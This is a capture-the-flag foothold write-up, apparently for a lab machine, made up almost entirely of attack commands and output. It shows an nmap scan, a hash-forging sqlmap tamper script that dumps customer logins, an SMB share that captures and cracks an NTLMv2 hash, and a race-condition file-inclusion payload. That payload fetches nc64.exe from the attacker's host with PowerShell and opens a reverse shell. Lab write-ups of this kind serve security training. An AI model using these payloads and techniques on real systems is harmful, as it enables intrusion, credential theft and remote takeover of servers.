Intelligence Foothold Write Up

Starting Nmap 7.91 ( https://nmap.org ) at 2021–07–10 03:30 UTC
Nmap scan report for 10.10.10.231
Host is up (0.023s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: OS Tidy Inc.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.46 seconds
/products-ajax.php?order=id+desc&h=a1b30d31d344a5a4e41e8496ccbdd26b
define('SECURE_PARAM_SALT','hie0shah6ooNoim');
#!/usr/bin/env python3
import sys
import hashlib
payload = sys.argv[1]
hash = hashlib.md5("hie0shah6ooNoim{}".format(payload).encode()).hexdigest()
print("{}&h={}".format(payload, hash))
#!/usr/bin/env python3
import hashlib
from urllib.parse import quote_plus
from lib.core.enums import PRIORITY
def tamper(payload, **kwargs):
h = hashlib.md5("hie0shah6ooNoim{}".format(payload).encode()).hexdigest()
retVal = "{}&h={}".format(quote_plus(payload), h)
return retVal
?order=1
?order=1` OR 1=1
sqlmap -u "http://10.10.10.231/products-ajax.php?order=1" --tamper=tamper/tamp.py --dbs --batch --skip-urlencode
available databases [3]:
[*] cleaner
[*] information_schema
[*] test
sqlmap -u "http://10.10.10.231/products-ajax.php?order=1" --tamper=tamper/tamp.py -D cleaner -T customers -C customer_name,id,login,password --dump --batch --skip-urlencode
Vikki Solomon
vikki.solomon@throwaway.mail
7c6a180b36896a0a8c02787eeafb0e4c
view-source:http://10.10.10.231/licenses/licenses.php?theme=&h=9094e65be4a9dc27cd4af70674a99c64
<!-- [2] file_get_contents(/header.inc): failed to open stream: No such file or directory
On line 35 in file C:\inetpub\wwwroot\functions.php
30 |
31 | // Following function securely includes a file. Whenever we
32 | // will encounter a PHP tag we will just bail out here.
33 | function secure_include($file) {
34 | if (strpos(file_get_contents($file),'<?') === false) { <<<<< Error encountered in this line.
35 | include($file);
36 | } else {
37 | http_response_code(403);
38 | die('Forbidden - Tampering attempt detected.');
39 | }
40 | }
// -->
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -ip 10.10.14.252 -smb2support jaquarh smb/.
view-source:http://10.10.10.231/licenses/licenses.php?theme=//10.10.14.252/jaquarh&h=07c866da1ae488edd68b22a2565393bf
web::PROPER:aaaaaaaaaaaaaaaa:2973a2127f086cc49af7f4bb7636c85e:01010000000000008046abc1a575d701cc009d7f75076fc900000000010010006d005000770054006f004b0045004a00030010006d005000770054006f004b0045004a00020010005900670072004c007400560075005100040010005900670072004c007400560075005100070008008046abc1a575d7010600040002000000080030003000000000000000000000000020000067b0f46c00d5d9fd16d72e09c70f660ab7c9c0fc4768e7c1b670bc799e8441640a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003200350032000000000000000000
web:charlotte123!
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -ip 10.10.14.252 -username web -password charlotte123! -smb2support jaquarh smb/.
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:JAQUARH)
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:JAQUARH)
[*] Closing down connection (10.10.10.231,51250)
[*] Remaining connections []
<!-- [2] file_get_contents(//10.10.14.252/jaquarh/header.inc): failed to open stream: No such file or directory
On line 35 in file C:\inetpub\wwwroot\functions.php
30 |
31 | // Following function securely includes a file. Whenever we
32 | // will encounter a PHP tag we will just bail out here.
33 | function secure_include($file) {
34 | if (strpos(file_get_contents($file),'<?') === false) { <<<<< Error encountered in this line.
35 | include($file);
36 | } else {
37 | http_response_code(403);
38 | die('Forbidden - Tampering attempt detected.');
39 | }
40 | }
// -->
#!/bin/bash
while((1))
do
echo '<?php echo 'done'; system('cmd /c powershell iwr http://10.10.14.252/nc64.exe -outf nc64.exe'); system('cmd /c start nc64exe -e cmd 10.10.14.252 9001') ?>' > header.inc
done
#!/usr/bin/env python3
import requests
import random
import threading
def thd():
_ = 0
while _ < 100:
req = requests.session()
login_url = "http://10.10.10.231/licenses/index.php"
data = {"username":"vikki.solomon@throwaway.mail", "password":"password1"}
res = req.post(url=login_url, data=data)
index_url = "http://10.10.10.231/licenses/licenses.php"
res = req.get(url=index_url)
payload_url = "http://10.10.10.231/licenses/licenses.php?theme=//10.10.14.252/rekt&h=b3f129945f358c3d9168614c18a893c8"
res = req.get(url=payload_url)
if "hacked" in res.text:
print(res.text)
logout_url = "http://10.10.10.231/licenses/logout.php"
res = req.get(url=logout_url)
_ += 1
poll = []
for i in range(0, 5):
single_thd = threading.Thread(target=thd)
poll.append(single_thd)
for n in poll:
n.start()
C:\inetpub\wwwroot\licenses>whoami
whoami
proper\web

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store